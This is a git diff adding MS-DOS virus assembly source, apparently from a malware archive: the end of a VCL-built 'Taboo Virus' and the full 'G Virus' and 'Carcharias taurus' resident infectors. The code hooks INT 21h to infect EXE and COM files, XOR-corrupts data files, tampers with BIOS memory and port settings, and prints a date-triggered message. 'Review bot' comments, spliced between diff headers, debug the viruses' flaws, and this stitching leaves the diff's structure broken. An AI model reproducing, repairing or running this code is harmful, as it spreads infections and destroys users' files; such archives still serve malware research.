+ je strt00 ; If equal, do effect + jmp end00 ; Otherwise skip over it +strt00: xor ah,ah ; BIOS get time function + int 1Ah + xchg dx,ax ; AX holds low word of timer + mov dx,0FFh ; Start with port 255 +out_loop: out dx,al ; OUT a value to the port + dec dx ; Do the next port + jne out_loop ; Repeat until DX = 0 + +end00: call get_minute + cmp ax,001Eh ; Did the function return 30? + jg strt01 ; If greater, do effect + jmp end01 ; Otherwise skip over it +strt01: mov cx,000Ah ; First argument is 10 +new_shot: push cx ; Save the current count + mov dx,0140h ; DX holds pitch + mov bx,0100h ; BX holds shot duration + in al,061h ; Read the speaker port + and al,11111100b ; Turn off the speaker bit +fire_shot: xor al,2 ; Toggle the speaker bit + out 061h,al ; Write AL to speaker port + add dx,09248h ; + mov cl,3 ; + ror dx,cl ; Figure out the delay time + mov cx,dx ; + and cx,01FFh ; + or cx,10 ; +shoot_pause: loop shoot_pause ; Delay a bit + dec bx ; Are we done with the shot? + jnz fire_shot ; If not, pulse the speaker + and al,11111100b ; Turn off the speaker bit + out 061h,al ; Write AL to speaker port + mov bx,0002h ; BX holds delay time (ticks) + xor ah,ah ; Get time function + int 1Ah ; BIOS timer interrupt + add bx,dx ; Add current time to delay +shoot_delay: int 1Ah ; Get the time again + cmp dx,bx ; Are we done yet? + jne shoot_delay ; If not, keep checking + pop cx ; Restore the count + loop new_shot ; Do another shot + +end01: call get_rollover + cmp ax,0001h ; Did the function return 1? + je strt02 ; If equal, do effect + jmp end02 ; Otherwise skip over it +strt02: mov dx,00C8h ; First argument is 200 + push es ; Save ES + mov ax,040h ; Set extra segment to 040h + mov es,ax ; (ROM BIOS) + mov word ptr es:[013h],dx ; Store new RAM ammount + pop es ; Restore ES + +end02: call get_day + cmp ax,0007h ; Did the function return 7? 
+ jg strt03 ; If greater, do effect + jmp end03 ; Otherwise skip over it +strt03: xor bx,bx ; Clear BX + mov si,0001h ; Second argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl bx,1 ; Convert to word index + shl si,1 ; Convert to word index + mov ax,word ptr [bx + 03FEh]; Zero COM port address + xchg word ptr [si + 03FEh],ax; Put first value in second, + mov word ptr [bx + 03FEh],ax; and second value in first! + pop es ; Restore ES + +end03: call get_dos_version + or ax,ax ; Did the function return zero? + jg strt04 ; If greater, do effect + jmp end04 ; Otherwise skip over it +strt04: mov dx,offset data00 ; DX points to data + push bp ; Save BP + mov bp,sp ; BP points to stack frame + sub sp,4096 ; Allocate 4096-byte buffer + push di ; Save DI + mov ah,02Fh ; DOS get DTA function + int 021h + mov di,bx ; DI points to DTA + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + int 021h + jc corrupt_end ; If no files found then exit +corrupt_file: mov ax,04301h ; DOS set file attributes function + xor cx,cx ; File will have no attributes + lea dx,[di + 01Eh] ; DX points to file name + int 021h + mov ax,03D02h ; DOS open file function, r/w + lea dx,[di + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; Transfer file handle to AX +c_crypt_loop: mov ah,03Fh ; DOS read from file function + mov cx,4096 ; Read 4k of characters + lea dx,[bp - 4096] ; DX points to the buffer + int 021h + or ax,ax ; Were 0 bytes read? 
+ je close_c_file ; If so then close it up + push ax ; Save AX + lea si,[bp - 4096] ; SI points to the buffer + xor ah,ah ; BIOS get clock ticks function + int 01Ah + pop cx ; CX holds number of bytes read + push cx ; Save CX +corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks + inc si ; Do the next byte + inc dx ; Change the key for next byte + loop corrupt_bytes ; Repeat until buffer is done + pop dx ; Restore DX (holds bytes read) + push dx ; Save count for write + mov ax,04201h ; DOS file seek function, current + mov cx,0FFFFh ; Seeking backwards + neg dx ; Seeking backwards + int 021h + mov ah,040h ; DOS write to file function + pop cx ; CX holds number of bytes read + lea dx,[bp - 4096] ; DX points to the buffer + int 021h + jmp short c_crypt_loop +close_c_file: mov ax,05701h ; DOS set file date/time function + mov cx,[di + 016h] ; CX holds old file time + mov dx,[di + 018h] ; DX holds old file data + int 021h + mov ah,03Eh ; DOS close file function + int 021h + mov ax,04301h ; DOS set file attributes function + xor ch,ch ; Clear CH for attributes + mov cl,[di + 015h] ; CL holds old attributes + lea dx,[di + 01Eh] ; DX points to file name + int 021h + mov ah,04Fh ; DOS find next file function + int 021h + jnc corrupt_file ; If successful do next file +corrupt_end: pop di ; Restore DI + mov sp,bp ; Deallocate local buffer + pop bp ; Restore BP + +end04: pop ax ; AL holds return value + mov ah,04Ch ; DOS terminate function + int 021h +main endp + + + db 0C3h,0FDh,0C2h,0F3h,0C7h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + mov dx,offset root ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea 
dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + mov dx,offset up_dir ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +exe_mask db "*.EXE",0 ; Mask for all .EXE files +traverse endp + + db 075h,03Dh,0BDh,095h,0EAh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP 
points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 0E7h,096h,07Dh,03Ch,0BEh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. 
to search for + repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc infection_done ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h + xchg bx,ax ; BX holds file handle + + call encrypt_code ; Write an encrypted copy + + mov ah,03Eh ; DOS close file function + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + + db 08Dh,0EDh,035h,0A0h,000h + +get_cpu proc near + mov dx,86 ; Assume it's an 8088/8086 + push sp + pop ax + cmp sp,ax + jne get_cpu_end ; If the test failed then exit + mov dx,286 ; Assume it's an 80286 + pushf + pop ax + or ax,04000h + popf + pushf + pop ax + test ax,04000h + jne get_cpu_end ; If the test failed then exit + mov dx,386 ; Assume it's an 80386 +.386c ; We have to use 386 instructions + mov ebx,esp + and esp,0FFFCh + pushfd + pop eax + mov ecx,eax + xor ax,0004h + push eax + popfd + pushfd + pop eax + and eax,0004h + and ecx,0004h + cmp eax,ecx + je is_386 ; If the test failed it's a 386 + mov dx,486 ; It must be a 80486 then +is_386: push ecx + popfd + mov esp,ebx +get_cpu_end: xchg dx,ax ; Transfer chip type to AX + ret ; Return to caller +get_cpu endp + + db 0F6h,016h,05Ch,072h,084h + +get_day proc near + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_day endp + + db 0C6h,02Eh,047h,0ACh,053h + +get_dos_version proc near + mov ah,030h ; DOS get DOS version function + int 021h + mov bx,ax ; Save return value in BX + xor bl,bl 
; Clear DOS major version in BX + xchg bh,bl ; Place 0 in BH, minor in BL + cbw ; Sign-extend AL into AX + mov cl,100 ; CL holds multiplier + mul cl ; Multiply AL by 100 + add ax,bx ; Add back the minor version + ret ; Return to caller +get_dos_version endp + + db 03Ah,06Fh,04Ah,03Dh,091h + +get_minute proc near + mov ah,02Ch ; DOS get time function + int 021h + mov al,cl ; Copy minute into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_minute endp + + db 02Ah,0D1h,031h,0C6h,081h + +get_rollover proc near + push es ; Save ES + mov ax,040h ; Set the extra segment to + mov es,ax ; 040h (ROM BIOS) + mov al,byte ptr [0070h] ; AL holds rollover flag + cbw ; Sign-extend AL into AX + pop es ; Restore ES + ret ; Return to caller +get_rollover endp + +data00 db "*.Dat" + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Taboo Virus" + db "Version 2.12" + db "By Virucidal Maniac" + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code 
; SI points to code to decrypt
+ mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
+xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
+ inc si ; Do the next word
+ inc si ;
+ loop xor_loop ; Loop until we're through
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label near
+
+code ends
+ end main
diff --git a/MSDOS/Virus.MSDOS.Unknown.target.asm b/MSDOS/Virus.MSDOS.Unknown.target.asm
new file mode 100644
index 00000000..df9f141a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.target.asm
@@ -0,0 +1,313 @@
+; Virus generated by G 0.70
+; G written by Dark Angel of Phalcon/Skism
+
+; File: TARGET.ASM
+; [G Virus] by Phalcon/Skism
+
+checkres1 = 'FF'
+checkres2 = 'FF'
+id = 'FF'
+
+ .model tiny
+ .code
+
+; Assemble with:
+; TASM /m3 filename.ASM
+; TLINK filename.OBJ
+; EXE2BIN filename.EXE filename.COM
+ org 0000h
+
+start:
+ call next
+next:
+ pop bp
+ sub bp, offset next
+
+ push es
+ push ds
+
+ mov ax, checkres1 ; Installation check
+ int 0021h
+ cmp ax, checkres2 ; Already installed?
+ jz done_install
+
+ mov ah, 004Ah ; alter memory allocation
+ mov bx, 0FFFFh ; of segment at ES
+ int 0021h
+
+ sub bx, (endheap-start+15)/16+1
+ mov ah, 004Ah ; alter memory allocation
+ int 0021h
+ jc done_install
+ sub word ptr ds:[0002h], (endheap-start+15)/16+1
+
+ mov ah, 0048h ; Allocate memory for the virus
+ mov bx, (endheap-start+15)/16
+ int 0021h
+ jc done_install
+
+ mov es, ax
+ dec ax
+ mov ds, ax ; Get MCB
+
+ mov byte ptr ds:[0000h], 'Z' ; Mark end of chain
+ mov word ptr ds:[0001h], 0008h ; Mark owner = DOS
+
+ push cs
+ pop ds
+ xor di, di
+ mov cx, (heap-start)/2+1 ; Bytes to move
+ mov si, bp ; lea si,[bp+offset start]
+ rep movsw
+
+ xor ax, ax
+ mov ds, ax
+ push ds
+ lds ax, ds:[21h*4] ; Get old int handler
+ mov word ptr es:oldint21, ax
+ mov word ptr es:oldint21+2, ds
+ pop ds
+ mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
+ mov ds:[21h*4+2], es ; in high memory
+
+done_install:
+ pop es
+ pop ds
+ cmp sp, id
+ jne restore_COM
+restore_EXE:
+ mov ax, es
+ add ax, 0010h
+ add cs:[bp+word ptr origCSIP+2], ax
+ add ax, cs:[bp+word ptr origSPSS]
+ cli
+ mov ss, ax
+ mov sp, cs:[bp+word ptr origSPSS+2]
+ sti
+ db 00EAh
+origCSIP db ?
+old3 db 0cdh,20h,0
+origSPSS dd ?
+
+restore_COM:
+ mov di, 0100h
+ push di
+ lea si, [bp+offset old3]
+ movsw
+ movsb
+ ret
+
+INT24:
+ mov al, 0003h
+ iret
+
+int21:
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ cmp ax, 4B00h ; execute?
+ jz execute
+return:
+ jmp exitint21
+execute:
+ mov word ptr cs:filename, dx
+ mov word ptr cs:filename+2, ds
+ mov ax, 3524h
+ int 0021h
+ push es
+ push bx
+
+ lea dx, INT24 ; ASSumes ds=cs
+ mov ax, 2524h
+ int 0021h
+
+ push cs
+ pop es
+
+
+ mov bx, dx
+ cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM
+ jz return ; Exit if so
+
+ lds dx, cs:filename
+ mov ax, 4300h
+ int 0021h
+ jc return
+ push cx
+ push ds
+ push dx
+
+ mov ax, 4301h ; clear file attributes
+ push ax ; save for later use
+ xor cx, cx
+ int 0021h
+
+ mov ax, 3D02h
+ lds dx, cs:filename
+ int 0021h
+ xchg ax, bx
+
+ push cs
+ pop ds
+
+ mov ax, 5700h ; get file time/date
+ int 0021h
+ push cx
+ push dx
+
+ mov ah, 003Fh
+ mov cx, 001Ah
+ mov dx, offset readbuffer
+ int 0021h
+
+ mov ax, 4202h
+ xor cx, cx
+ cwd
+ int 0021h
+
+ cmp word ptr [offset readbuffer], 'ZM'
+ jz checkEXE
+
+ mov cx, word ptr [offset readbuffer+1] ; jmp location
+ add cx, heap-start+3 ; convert to filesize
+ cmp ax, cx ; equal if already infected
+ jz jmp_close
+
+ cmp ax, 65535-(endheap-start) ; check if too large
+ ja jmp_close ; Exit if so
+
+ mov si, offset readbuffer
+ mov di, offset old3
+ movsb
+ movsw
+
+ mov cx, 0003h
+ sub ax, cx
+ mov word ptr [offset readbuffer+1], ax
+ mov dl, 00E9h
+ mov byte ptr [offset readbuffer], dl
+ jmp short continue_infect
+checkEXE:
+ cmp word ptr [offset readbuffer+10h], id
+ jnz skipp
+jmp_close:
+ jmp close
+skipp:
+
+ lea si, readbuffer+14h
+ lea di, origCSIP
+ movsw ; Save original CS and IP
+ movsw
+
+ sub si, 000Ah
+ movsw ; Save original SS and SP
+ movsw
+
+ push bx ; save file handle
+ mov bx, word ptr [readbuffer+8] ; Header size in paragraphs
+ mov cl, 0004h
+ shl bx, cl
+
+ push dx ; Save file size on the
+ push ax ; stack
+
+ sub ax, bx ; File size - Header size
+ sbb dx, 0000h ; DX:AX - BX -> DX:AX
+
+ mov cx, 0010h
+ div cx ; DX:AX/CX = AX Remainder DX
+
+ mov word ptr [readbuffer+14h], dx ; IP Offset
+ mov word ptr [readbuffer+10h], id ; Initial SP
+ mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment
+ mov word ptr [readbuffer+16h], ax ; Para disp CS in module.
+
+ pop ax ; Filelength in DX:AX
+ pop dx
+
+ add ax, heap-start
+ adc dx, 0000h
+
+ mov cl, 0009h
+ push ax
+ shr ax, cl
+ ror dx, cl
+ stc
+ adc dx, ax
+ pop ax
+ and ah, 0001h
+
+ mov word ptr [readbuffer+4], dx ; Fix-up the file size in
+ mov word ptr [readbuffer+2], ax ; the EXE header.
+
+ pop bx ; restore file handle
+ mov cx, 001Ah
+
+continue_infect:
+ push cx ; save # bytes to write
+
+ mov cx, heap-start
+ mov ah, 0040h ; concatenate virus
+ mov dx, offset start
+ int 0021h
+
+ xor dx, dx
+ xor cx, cx
+ mov ax, 4200h
+ int 0021h
+
+
+ pop cx
+ mov ah, 0040h
+ mov dx, offset readbuffer
+ int 0021h
+
+
+close:
+ mov ax, 5701h ; restore file time/date
+ pop dx
+ pop cx
+ int 0021h
+
+ mov ah, 003Eh
+ int 0021h
+
+ pop ax ; restore file attributes
+ pop dx ; get filename and
+ pop ds
+ pop cx ; attributes from stack
+ int 0021h
+
+ pop dx
+ pop ds
+ mov ax, 2524h
+ int 0021h
+
+exitint21:
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+ db 00EAh ; return to original handler
+oldint21 dd ?
+
+signature db '[PS/G]',0 ; Phalcon/Skism G
+creator db 'Phalcon/Skism',0
+virusname db '[G Virus]',0
+
+heap:
+filename dd ?
+readbuffer db 1ah dup (?)
+endheap:
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.taurus.asm b/MSDOS/Virus.MSDOS.Unknown.taurus.asm
new file mode 100644
index 00000000..95dda9cc
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.taurus.asm
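Review bot: The two early exits inside `execute` (`jz return` after the COMMAND.COM test and `jc return` after the 4300h attribute query) reach `exitint21` with the two words saved for the old INT 24h vector (`push es` / `push bx`) still on the stack, so the eight pops there are shifted by two words, INT 24h is left pointing at the handler, and the far jump through `oldint21` runs with a corrupted register set. The COMMAND.COM test is also reading the wrong memory: `mov bx, dx` runs after `lea dx, INT24` has replaced the file-name offset, so `cmp word ptr [bx+5], 'DN'` compares bytes at the caller's DS plus the INT24 offset rather than the name, and the `; ASSumes ds=cs` comment is wrong at that point because DS is still the EXEC caller's segment. Separately, the resident handler only reacts to `ax == 4B00h`, so the installation check (`mov ax, checkres1` / `int 21h` / `cmp ax, checkres2`, with the `'FF'` generator placeholders left unfilled) is passed straight to DOS as AH=46h and, unless that call happens to leave AX intact, the code re-installs and shrinks conventional memory on every infected run. For analysts I would mark both spots: at `return:` add `; NOTE: reached with the old INT 24h vector still pushed - pops in exitint21 are misaligned`, and at the installation check add `; NOTE: resident handler never answers this check; re-installs each run`.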
@@ -0,0 +1,378 @@ +TITLE The Carcharias taurus 2.0 + .MODEL Tiny + .CODE + .STARTUP + +; Some Constants ------------------------------------------------------------- + DogSize equ 584-16-6 +; ---------------------------------------------------------------------------- + + db 0E9h ; JMP Loader + dw 3 + db 0 + dw 0256h +; ************************** DOG LOADER ************************************** + Loader: + + call GetBP ; Get BP + GetBP: pop BP + sub BP, 103h + push AX ; Save AX + +; Find Z-MCB ----------------------------------------------------------------- + mov AH, 52h + int 21h + + mov DX, ES:[BX-2] + mov DI, (OFFSET Place)-6 + mov DS:[BP+DI], DX + + NEXT0: + mov DI, (OFFSET Place)-6 + mov ES, DS:[BP+DI] + mov DX, ES:[3] ; Calc the next MCB seg + inc DX + add DS:[BP+DI], DX + + cmp ES:[0], byte ptr 'Z' + jne NEXT0 +; ---------------------------------------------------------------------------- + +; Looking for the Dog behind Z-MCB ------------------------------------------- + push ES + mov DX, ES + add DX, ES:[3] + inc DX + mov ES, DX + mov DX, ES:[3] + pop ES + cmp DX, 815Dh ; 815Dh - Dog's bytes + je LExit +; ---------------------------------------------------------------------------- + + +; Eat 1K in the Z-MCB, Current PSP, BIOS Data -------------------------------- + + push DS + sub ES:[3], word ptr 40h ; Dec Z-MCB + + mov AH, 62h + int 21h + mov DS, BX + sub DS:[2], word ptr 40h ; Dec Curr PSP + + xor DX, DX + mov DS, DX + dec word ptr DS:[413h] + + pop DS +; ---------------------------------------------------------------------------- + +; Calculate Dog's segment adress --------------------------------------------- + mov DX, CS + add DX, ES:[3] + mov ES, DX +; ---------------------------------------------------------------------------- + +; Now load the Dog ----------------------------------------------------------- + xor DI, DI + mov SI, BP + add SI, 100h + mov CX, DogSize + cld + rep movsb +; 
---------------------------------------------------------------------------- + +; Hook 21h ------------------------------------------------------------------- +; Get old vector + push ES + mov AX, 3521h + int 21h + mov DX, ES + pop ES + mov DI, (OFFSET Exit21h)-100h-6+1 + mov ES:[DI], BX + inc DI + inc DI + mov ES:[DI], DX + +; Set 21h to Dog + mov AX, 2521h + mov DX, (OFFSET Dog)-100h-6 + push DS + push ES + pop DS + int 21h + pop DS +; ---------------------------------------------------------------------------- + +; Loader Exit ---------------------------------------------------------------- + LExit: +; Restore first 6 bytes + mov DI, (OFFSET M_6Bytes)-6 + mov AX, word ptr DS:[BP+DI] + inc DI + inc DI + mov BX, word ptr DS:[BP+DI] + inc DI + inc DI + mov CX, word ptr DS:[BP+DI] + mov word ptr CS:[100h], AX + mov word ptr CS:[102h], BX + mov word ptr CS:[104h], CX + +; Restore all registers + pop AX + xor BX, BX + xor CX, CX + xor DI, DI + xor SI, SI + xor BP, BP + mov DX, 100h + push DX + xor DX, DX + push DS + pop ES + ret +; ---------------------------------------------------------------------------- + +; ************************** END of DOG LOADER ******************************* + + +; ******************************* DOG ************************************** + Dog: + pushf + cmp AX, 4B00h + je D01 + jmp QuickExit + D01: push AX + push BX + push CX + push DX + push DI + push SI + push DS + push ES + + push DX ; Store file name + push DS + + +; Effect ? ------------------------------------------------------------------- + mov AH, 2Ah + int 21h + cmp CX, 1993 ; After 1992 + jb EExit + cmp DH, 1 ; Jan, + jne EExit + mov AH, 2Ch + int 21h + cmp CH, 14 + jne EExit + cmp CL, 30 + jb EExit +; yes! 
+ push CS + pop DS + mov CX, 20 + mov AH, 2 + mov SI, (OFFSET Tired)-100h-6 + CHN: mov DL, byte ptr DS:[SI] + inc SI + dec DL + int 21h + loop CHN +; cli +; hlt +; ---------------------------------------------------------------------------- + + EExit: +; Store old int 24h vector --------------------------------------------------- + mov AX, 3524h ; Get intrpt vector (ES:BX) + int 21h + mov DI, (OFFSET Old24h)-100h-6 + mov CS:[DI], BX ; Store BX + inc DI + inc DI + mov CS:[DI], ES ; Store ES +; ---------------------------------------------------------------------------- + +; Set new int 24h handler ---------------------------------------------------- + mov AX, 2524h ; Set intrpt vector (DS:DX) + mov DX, (OFFSET INT24)-100h-6 + push CS + pop DS + int 21h +; ---------------------------------------------------------------------------- + + +; ----------------------------------------------------- + pop DS + pop DX +; ---------------------------------------------------------------------------- + + +; Open the file -------------------------------------------------------------- + mov AX, 3D02h + int 21h + mov DI, (OFFSET Handle)-100h-6 + mov CS:[DI], AX + jnc D02 + jmp DExit + D02: +; ---------------------------------------------------------------------------- + +; Read 1st 6 bytes ----------------------------------------------------------- + push CS + pop DS + mov AH, 3Fh + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov DX, (OFFSET M_6Bytes)-100h-6 + mov CX, 6 + int 21h + jnc D03 + jmp DExit + + D03: +; ---------------------------------------------------------------------------- + +; Check File Format ---------------------------------------------------------- + mov DI, (OFFSET M_6Bytes)-100h-6 + cmp CS:[DI], 4D5Ah + jne D04 + jmp DExit + D04: cmp CS:[DI], 5A4Dh + je DExit +; ---------------------------------------------------------------------------- + +; Check File for Dog --------------------------------------------------------- + cmp CS:[DI+3], 0256h + je DExit 
+; ---------------------------------------------------------------------------- + +; Get and Store file Date&Time ----------------------------------------------- + mov AX, 5700h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + int 21h + mov DI, (OFFSET FDate)-100h-6 + mov CS:[DI], DX + inc DI + inc DI + mov CS:[DI], CX +; ---------------------------------------------------------------------------- + +; Get and Store file Size ---------------------------------------------------- + mov AX, 4202h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + xor DX, DX + xor CX, CX + int 21h + mov DI, (OFFSET FSize)-100h-6 + sub AX, 3 + mov CS:[DI], AX + cmp AX, 64512 + ja DExit + cmp AX, 6 + jb DExit +; ---------------------------------------------------------------------------- + + +; Add Dog to the file -------------------------------------------------------- + push CS + pop DS + mov AH, 40h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov CX, DogSize + xor DX, DX + int 21h +; ---------------------------------------------------------------------------- + +; Write 1st 6 bytes to file -------------------------------------------------- +; Move file ptr to the start + mov AX, 4200h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + xor DX, DX + xor CX, CX + int 21h +; Write ... 
+ mov AH, 40h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov CX, 6 + mov DX, (OFFSET DogCall)-100h-6 + int 21h +; ---------------------------------------------------------------------------- + + DExit: + +; Set file Date&Time --------------------------------------------------------- + mov AX, 5701h + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + mov DI, (OFFSET FDate)-100h-6 + mov DX, CS:[DI] + inc DI + inc DI + mov CX, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + + +; Close the file ------------------------------------------------------------- + mov AH, 3Eh + mov DI, (OFFSET Handle)-100h-6 + mov BX, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + +; Restore int 24h ------------------------------------------------------------ + mov AX, 2524h ; Set intrpt vector (DS:DX) + mov DI, (OFFSET Old24h)-100h-6 + mov DX, CS:[DI] + inc DI + inc DI + mov DS, CS:[DI] + int 21h +; ---------------------------------------------------------------------------- + + pop ES + pop DS + pop SI + pop DI + pop DX + pop CX + pop BX + pop AX + + QuickExit: popf + Exit21h: db 0EAh + Int21hIP: dw 0 ; BX + Int21hCS: dw 0 ; ES + +; Int 24h handler ------------------------------------------------------------ + INT24: xor al, al ; Ignore critical error + iret +; ---------------------------------------------------------------------------- + + +; **************************** END of DOG ********************************** + + DogData: + M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h + Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11 + DogCall db 0E9h + FSize dw 0606h + Sign db 'V', 2 + Handle dw 0606h + Vers dw 0606h + FDate dw 0606h, 0606h ; Date, Time + Old24h dw 0606h, 0606h ; BX:ES + Attrib dw 0606h + Place dw 0606h + END + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm b/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm new file mode 100644 index 00000000..672cf27b 
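Review bot: When `mov AX, 3D02h` / `int 21h` fails, the DOS error code in AX is still stored into `Handle` before the `jmp DExit`, and the `DExit` tail then issues `5701h` and `3Eh` with BX equal to that error code, so a failed open ends by stamping and closing whatever handle in the EXEC caller's table has that number (2, stderr, for file-not-found; 5, typically the caller's first own file, for access-denied). The same tail is harmless after the `MZ` and `0256h` checks because the handle is valid there; only the open-failure branch reaches it with a bogus handle, and I would mark it: `; NOTE: Handle holds the DOS error code here - DExit stamps and closes a foreign handle`. The dropper's own header (`db 0E9h` / `dw 3` / `db 0` / `dw 0256h`) also places the marker word at offset 4, while the infection check `cmp CS:[DI+3], 0256h` and the six-byte `DogCall` record written to infected files place it at offset 3, so the dropper itself is never recognized as already infected. A header comment would help triage: `; Resident COM infector hooking INT 21h AH=4Bh; takes the top 1 KB of the last (Z) memory block (shrinks the MCB, the PSP top-of-memory word and BIOS 0040:0013); marks files with 56h,02h at offset 3; payload prints "Happy New Year!" (stored +1, decoded by dec DL) from 14:30 to 14:59 in January of 1993 or later.`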
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.taz-1973.asm
